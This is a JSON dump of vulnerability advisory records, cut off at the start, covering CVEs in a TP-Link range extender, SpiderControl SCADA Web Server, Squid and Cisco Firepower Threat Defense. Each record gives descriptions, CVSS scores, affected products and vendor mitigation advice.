"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-10-03T13:20:12", "description": "TP-Link TL-WA850RE Wi-Fi Range Extender with hardware version 5 allows remote attackers to cause a denial of service (reboot) via data/reboot.json.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-23T21:29:00", "title": "CVE-2018-12694", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12694"], "modified": "2018-08-24T14:32:00", "cpe": ["cpe:/o:tp-link:tl-wa850re_firmware:-"], "id": "CVE-2018-12694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12694", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:tp-link:tl-wa850re_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:34", "description": "A Directory Traversal issue was discovered in SpiderControl SCADA Web Server. An attacker may be able to use a simple GET request to perform a directory traversal into system files.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-25T19:29:00", "title": "CVE-2017-12694", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12694"], "modified": "2019-10-09T23:23:00", "cpe": ["cpe:/a:spidercontrol:scada_web_server:-"], "id": "CVE-2017-12694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12694", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:spidercontrol:scada_web_server:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:38", "description": "Heap-based buffer overflow in the Icmp6::Recv function in icmp/Icmp6.cc in the pinger utility in Squid before 3.5.16 and 4.x before 4.0.8 allows remote servers to cause a denial of service (performance degradation or transition failures) or write sensitive information to log files via an ICMPv6 packet.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "baseScore": 8.2, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.2}, "published": "2016-04-07T18:59:00", "title": "CVE-2016-3947", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3947"], "modified": "2016-11-28T20:14:00", "cpe": ["cpe:/a:squid-cache:squid:4.0.6", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:squid-cache:squid:4.0.2", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/a:squid-cache:squid:4.0.4", "cpe:/a:squid-cache:squid:4.0.7", "cpe:/a:squid-cache:squid:3.5.15", "cpe:/a:squid-cache:squid:4.0.3", "cpe:/a:squid-cache:squid:4.0.5", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/a:squid-cache:squid:4.0.1"], "id": "CVE-2016-3947", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3947", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:squid-cache:squid:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:a:squid-cache:squid:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "cisco": [{"lastseen": "2020-12-24T11:40:39", "bulletinFamily": "software", "cvelist": ["CVE-2019-12694"], "description": "A vulnerability in the command line interface (CLI) of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker with administrative privileges to execute commands on the underlying operating system with root privileges.\nThe vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by executing a specific CLI command that includes crafted arguments. A successful exploit could allow the attacker to execute commands on the underlying OS with root privileges.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj\"]", "modified": "2019-10-02T15:48:50", "published": "2019-10-02T16:00:00", "id": "CISCO-SA-20191002-FTD-CMDINJ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191002-ftd-cmdinj", "type": "cisco", "title": "Cisco Firepower Threat Defense Software Command Injection Vulnerability", "cvss": {"score": 6.7, "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}}], "symantec": [{"lastseen": "2019-10-07T14:36:16", "bulletinFamily": "software", "cvelist": ["CVE-2019-12694"], "description": "### Description\n\nCisco Firepower Threat Defense Software is prone to a local command-injection vulnerability. An attacker may exploit this issue to inject and execute arbitrary commands on the underlying OS with root privileges. This issue being tracked by Cisco Bug IDs CSCvo45799.\n\n### Technologies Affected\n\n * Cisco Firepower Threat Defense Software (FTD) 6.1.0 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.0 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.1 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.2 \n * Cisco Firepower Threat Defense Software (FTD) 6.2.3 \n * Cisco Firepower Threat Defense Software (FTD) 6.3.0 \n * Cisco Firepower Threat Defense Software (FTD) 6.4.0 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nRestrict local access to trusted and accountable individuals only.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-10-02T00:00:00", "published": "2019-10-02T00:00:00", "id": "SMNTC-110329", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110329", "type": "symantec", "title": "Cisco Firepower Threat Defense Software CVE-2019-12694 Local Command Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2020-06-22T11:41:25", "bulletinFamily": "info", "cvelist": ["CVE-2017-12694"], "edition": 2, "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of SpiderControl SCADA. Authentication is not required to exploit this vulnerability. The specific flaw exists within web server access to the scdefault directory. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose files accessible to the SYSTEM account.", "modified": "2017-06-22T00:00:00", "published": "2017-08-23T00:00:00", "id": "ZDI-17-695", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-695/", "title": "SpiderControl SCADA Webserver iniNet Directory Traversal Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2020-12-18T03:22:36", "bulletinFamily": "info", "cvelist": ["CVE-2017-12694"], "description": "### **CVSS v3 5.3**\n\n**ATTENTION: **Remotely exploitable/low skill level to exploit.\n\n**Vendor:** SpiderControl\n\n**Equipment:** SCADA Web Server\n\n**Vulnerability:** Directory Traversal\n\n## AFFECTED PRODUCTS\n\nThe following versions of SpiderControl SCADA Web Server, a software management platform, are affected:\n\n * SCADA Web Server\n\n## IMPACT\n\nSuccessful exploitation of this vulnerability could cause an attacker to gain read access to system files through directory traversal.\n\n## MITIGATION\n\nSpiderControl has produced a new version of the software (Version 2.02.0100) that can be found at:\n\n<http://spidercontrol.net/downloads-support/user-downloads/>\n\nNCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## VULNERABILITY OVERVIEW\n\n## [IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (\u2018PATH TRAVERSAL\u2019) CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nAn attacker may be able to use a simple GET request to perform a directory traversal into system files.\n\n[CVE-2017-12694](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12694>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)).\n\n## RESEARCHER\n\nKarn Ganeshen, working with Trend Micro\u2019s Zero Day Initiative, discovered this vulnerability.\n\n## BACKGROUND\n\n**Critical Infrastructure Sector:** Critical Manufacturing\n\n**Countries/Areas Deployed:** Europe\n\n**Company Headquarters Location:** Switzerland\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-17-234-03>); we'd welcome your feedback.\n", "edition": 15, "modified": "2017-08-22T00:00:00", "published": "2017-08-22T00:00:00", "id": "ICSA-17-234-03", "href": "https://www.us-cert.gov//ics/advisories/ICSA-17-234-03", "title": "SpiderControl SCADA Web Server", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
